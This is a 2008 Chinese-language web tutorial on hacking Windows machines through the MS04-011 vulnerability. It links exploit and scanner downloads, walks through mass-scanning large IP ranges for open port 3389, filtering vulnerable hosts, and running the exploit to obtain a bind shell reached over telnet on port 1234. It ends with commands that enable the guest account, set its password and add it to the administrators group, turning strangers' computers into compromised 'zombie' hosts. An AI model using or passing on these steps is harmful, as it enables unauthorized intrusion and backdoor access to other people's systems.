ms04011漏洞攻击！超级教程

来源: 2008-3-30 10:09:15 网友评论 0 条字体:[大中小] 我要投稿!

首先是下载工具拉：）
http://www.kissfen.com/ms04011.cab (ms04011溢出+扫描程序)
http://www.kissfen.com/WINNTAutoAttack2.6.rar (傻瓜式的攻击+扫描程序含教程）
下载完成后首先把两个程序解压！现在我们要快速搞到肉机！而且只要3389的！我是个懒人所以只喜欢这么做！
首先打开WINNTAutoAttack.exe
出现WINNTAutoAttack的主程序！
把哪个只检测3389端口勾上就行了。。其他什么也别勾！
然后在IP段哪里填上一个打范围的IP段`比如
211.10.0.0
211.10.255.255
然后扫描！
开始扫描手休息10分钟............zzzzzzzzz
过了一会儿扫描完成了。。是不是出现了很多开放3389的机子啊？
然后看旁边有个存在问题主机列表里面
有xxx.xxx.xxx.xxx 3******的东西，全选copy（复制）下来~~建立一个记事本稳当全部粘贴进去，然后点查找替换在查找哪里复制上3*******替换嗯那里为空！然后点确定！
记事本里面就只剩下IP了！接下来是要找出这些IP里面有没有可以溢出的电脑！
运行DSScan.exe就是ms04011的扫描软件！点哪个Read IPs from哪里的Browse..按钮！
选到刚才建立的哪个记事本文档，然后点扫描.......................................... 字串4
过了一会儿结果就出来了~现在开始查找有VULNERABLE的主机~也就是可以溢出的！
选定一个`复制好IP！接下来开两个CMD窗口！一个用来溢出，一个用来登陆！
先用getos IP确定一下什么系统
然后运行ms04011.exe溢出格式为：
ms04011 0 IP 溢出win2k系统
ms04011 1 IP 溢出XP系统
好了下面我们开始溢出
假设我们得到的是一台win2K的系统
D:\>ms041 0 **.141.105.139
shellcode size 404
光标停在这里了

假如出现上面的情况就表示可以telnet了。！
用另外一个窗口登陆telnet IP 1234
telnet上他的1234端口！
结果嘛~~当然是进去拉呀~~还楞着做什么？快提升权限吧~~~
net user guest /active:yes　　　　激活guest帐号
net user guest 123456　　　　　修改密码为123456
net localgroup administrators guest /add　　加入到administators组

上一篇：139端口漏洞的入侵
下一篇：20种看asp源码的方法及工具

返回主站：极限资讯网首页

极限图文资讯

	几种关闭ipc$默认共享的方法		易建联状态回勇取11分7板雄鹿主		征服男人吧
	爱你爱到杀死......我自己		奥运火炬传递歌曲出炉		反弹了，你准备走还是留？